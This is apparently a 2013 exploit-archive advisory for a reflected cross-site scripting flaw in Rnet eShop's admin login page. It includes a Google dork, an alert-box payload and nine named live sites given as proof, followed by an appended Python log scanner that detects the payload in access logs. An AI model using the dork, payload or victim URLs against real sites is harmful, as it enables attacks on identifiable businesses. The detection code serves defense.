Sites powered by Rnet eShop suffer from a cross-site scripting vulnerability. Note that this finding houses site-specific data.
#******************************************************************
# [+] Exploit Title : Rnet eShop Cross site scripting vulnerability
#
# [+] Software link : http://www.rnet.no
#
# [+] Exploit Author : Ashiyane Digital Security Team
#
# [+] Tested on: Windows 7 , Linux
#
# [+] Google Dork : intext:" Powered by Rnet eShop"
#
# [+] Date: 2013/09/01
#
--------------------------------------------------------------------
# [+] Exploit :
#
# [+] Location : [Target]/_admin_login.asp?e=&n=[xss]
#
#-------
# Proof:
#-------
#
# http://www.klamydia.no/_admin_login.asp?e=&n="/><script>alert(1);</script>
#
# http://www.glamourtopz.com/_admin_login.asp?e=&n="/><script>alert(1);</script>
#
# http://www.smart-alarm.no/_admin_login.asp?e=&n="/><script>alert(1);</script>
#
# http://www.testselv.no/_admin_login.asp?e=&n="/><script>alert(1);</script>
#
# http://www.urmaker-ronning.no/_admin_login.asp?e=&n="/><script>alert(1);</script>
#
# http://www.galleri-lindesnes.no/_admin_login.asp?e=&n="/><script>alert(1);</script>
#
# http://www.vareshop.no/_admin_login.asp?e=&n="/><script>alert(1);</script>
#
# http://tarmkreft.no/_admin_login.asp?e=&n="/><script>alert(1);</script>
#
# http://www.perleshop.no/_admin_login.asp?e=&n="/><script>alert(1);</script>
#
#
######################
discovered by : ACC3SS
######################
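
A log check for the pattern in the Location line above, added here and not part of the original advisory: it scans access-log lines for requests to `_admin_login.asp` whose `n` parameter decodes to characters that close a quoted HTML attribute or open a tag. The combined-log-format sample lines, the 192.0.2.x addresses and the function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoint and parameter taken from the advisory's Location line.
TARGET_PATH = "/_admin_login.asp"
TARGET_PARAM = "n"
# Characters a reflected value needs to close a quoted attribute and open a tag.
BREAKOUT = re.compile(r'["<>]')
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (combined log format, documentation addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Sep/2013:10:00:01 +0000] "GET /_admin_login.asp?e=&n= HTTP/1.1" 200 2311',
    '192.0.2.44 - - [01/Sep/2013:10:02:17 +0000] "GET /_admin_login.asp?e=&n=%22/%3E%3Cscript%3Ealert(1);%3C/script%3E HTTP/1.1" 200 2360',
    '192.0.2.44 - - [01/Sep/2013:10:02:40 +0000] "GET /_Admin_Login.asp?e=&n=%2522%252F%253E%253Cscript%253E HTTP/1.1" 200 2349',
    '192.0.2.10 - - [01/Sep/2013:10:05:09 +0000] "GET /product.asp?n=%3Cb%3E HTTP/1.1" 200 5120',
]

def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding (e.g. %253C -> %3C -> <)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_requests(log_lines):
    """Return (line_number, decoded_value) for requests that put markup in n=."""
    hits = []
    for lineno, line in enumerate(log_lines, 1):
        match = REQUEST_LINE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.lower().endswith(TARGET_PATH):  # IIS paths are case-insensitive
            continue
        params = parse_qs(url.query, keep_blank_values=True)
        for raw in params.get(TARGET_PARAM, []):
            value = fully_decode(raw)
            if BREAKOUT.search(value):
                hits.append((lineno, value))
    return hits

if __name__ == "__main__":
    for lineno, value in suspicious_requests(SAMPLE_LOG):
        print(f"line {lineno}: n={value!r}")
```

A hit means the request carried markup in `n`; whether the page reflected it unencoded has to be confirmed from the response.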